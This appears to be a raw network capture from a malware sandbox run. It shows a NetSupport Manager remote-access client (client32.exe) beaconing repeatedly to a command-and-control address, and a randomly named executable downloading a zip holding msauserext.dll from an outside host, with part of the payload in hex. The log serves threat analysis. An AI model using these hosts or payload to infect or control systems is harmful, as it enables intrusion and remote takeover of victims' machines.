Dec 10, 2024 09:01:12.912460089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.012479067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.112451077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.217180967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.315438986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.417012930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.515446901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.615458012 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.716437101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.819267035 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:13.917463064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.021187067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.117453098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.218523026 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.318501949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.419519901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.520486116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.620471001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.720503092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.821456909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:14.922466993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.023483038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.123526096 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.224488020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.327914953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.424523115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.524487972 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.625202894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.724889994 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.824559927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:15.926425934 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.027424097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.126521111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.227551937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.328615904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.429542065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.529536009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.630510092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.730511904 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.831496954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:16.931571960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.031563044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.135350943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.231591940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.333233118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.433221102 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.533739090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.634591103 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.735122919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.836199999 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:17.939834118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.041254997 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.139503002 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.541500092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.641526937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.742508888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.844320059 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:18.945544958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.045638084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.149240971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.262814999 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.364258051 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.463532925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.565253973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.665364981 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.763529062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.865258932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:19.964521885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.065563917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.165587902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.268863916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.369699955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.470561028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:20.571552992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49729	104.26.0.231	80	4412	C:\Users\user\AppData\Local\DNScache\client32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 08:57:31.210863113 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 08:57:32.446407080 CET	995	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 07:57:32 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8efbaf43e8da4240-EWR CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDSAQDRQAT=ADPGNGJDFKMPGLNOCNOMKLEB; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kirJC%2FFQTvia8mIvQYfuKs59N4uSK%2FFof6jVqhym3kbMPYfwTr%2F9CUFdu%2Bjty3ssrNJF3sXNp275msIcZFUxu2tYhHNrRF200C%2B8MInS7zAskrWsx2HpgDH9DD%2Fkq33cD0KyU2LFc7sDfhry"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=2325&min_rtt=2325&rtt_var=1162&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a Data Ascii: 1040.7357,-74.17240

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	23.254.224.41	443	5272	C:\Users\user\Desktop\lFxGd66yDa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 07:57:17 UTC	55	OUT	GET /dwnld/2nd2_1.zip HTTP/1.1 Host: cycleconf.com
2024-12-10 07:57:17 UTC	262	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 07:57:17 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Jul 2024 21:12:22 GMT Accept-Ranges: bytes Content-Length: 41029 Vary: Accept-Encoding Content-Type: application/zip
2024-12-10 07:57:17 UTC	7930	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 7c 8b 14 53 cd 14 86 d9 ca 1f 00 00 00 4a 00 00 0e 00 00 00 6d 73 61 75 73 65 72 65 78 74 2e 64 6c 6c ed 7c 0d 78 53 d7 95 e0 95 2c 81 00 1b 0b 62 83 43 1c 50 8a 49 dc 00 ce 93 25 db 92 7f b0 8c 2d 07 1a db c8 ff 90 60 6c 61 3d 23 39 b2 ac 48 ef 11 9c 85 8e 13 e3 2d ca 8b 3b 6c 9a 6e 33 1d 3a 1b 20 db a6 6d b6 93 4c 99 86 7a d2 46 60 82 0d 21 59 a7 cd 26 24 a1 1d 37 e3 4c 45 ed 4d 9d 29 05 87 38 68 cf b9 ef ea c7 7f 34 9d f9 f6 fb f6 db e6 f1 dd 7b df 3d e7 dc 73 cf cf fd 39 57 be 8f ca fb 0f 93 04 42 88 0a 52 38 4c c8 49 22 3f 16 f2 a7 9f 09 48 4b d7 f4 2f 25 27 16 bd 7e c7 49 45 c5 eb 77 d4 39 5d 7e 9d d7 d7 b9 c7 67 ef d0 b5 da 3d 9e 4e 41 b7 9b d7 f9 44 8f ce e5 d1 95 6d ab d5 75 74 3a f8 ac a4 a4 c5 19 8c c7 ab bf 7c 81 Data Ascii: PK\|SJmsauserext.dll\|xS,bCPI%-`la=#9H-;ln3: mLzF`!Y&$7LEM)8h4{=s9WBR8LI"?HK/%'~IEw9]~g=NADmut:\|
2024-12-10 07:57:17 UTC	8000	IN	Data Raw: f5 e5 fa 2a fd df e8 5f 02 5b 7f a8 9f d2 2f cb ce 31 54 82 85 ce 1a 7e 63 30 1a 77 1a 7d c6 1e d0 fe 98 f1 07 c6 a0 71 c8 38 6e fc a3 b1 30 67 73 ce 96 9c e7 72 fe 47 ce 2b 39 bf ca f9 38 e7 5a ce 77 73 cf e4 fe 32 f7 52 ee 87 b9 d7 73 93 f3 56 e7 dd 99 77 4f 5e 4e 5e 4d de b1 bc ef e5 5d c8 fb 5f 79 23 79 bf cd fb 24 2f 9c a7 36 2d 31 2d 33 ad 34 ad 36 ad 33 6d 30 19 4c f9 a6 12 d3 16 93 cd b4 dd d4 62 72 9b 44 d3 23 a6 6e d3 e3 a6 a7 4c cf 9a 4e 98 fa 4d af 82 4d df 31 fd d6 34 61 fa cc 94 60 5e 64 4e 36 a7 98 ef 30 67 9b 4d 66 bb 79 8f b9 c3 fc 90 f9 b0 f9 69 f3 11 f3 b3 e6 e7 cc 2f 98 4f 98 5f 36 07 c1 fe 17 cc 6f 99 2f 82 0f 46 cd e3 e6 09 f0 c2 86 7c 2e 1f bf 13 c4 58 47 1e e1 85 1c b1 c9 df 16 8e 72 f2 df b4 12 09 fb 3f 72 fe 3f 7f fe 0f 50 4b 03 Data Ascii: *_[/1T~c0w}q8n0gsrG+98Zws2RsVwO^N^M]_y#y$/6-1-3463m0LbrD#nLNMM14a`^dN60gMfyi/O_6o/F\|.XGr?r?PK
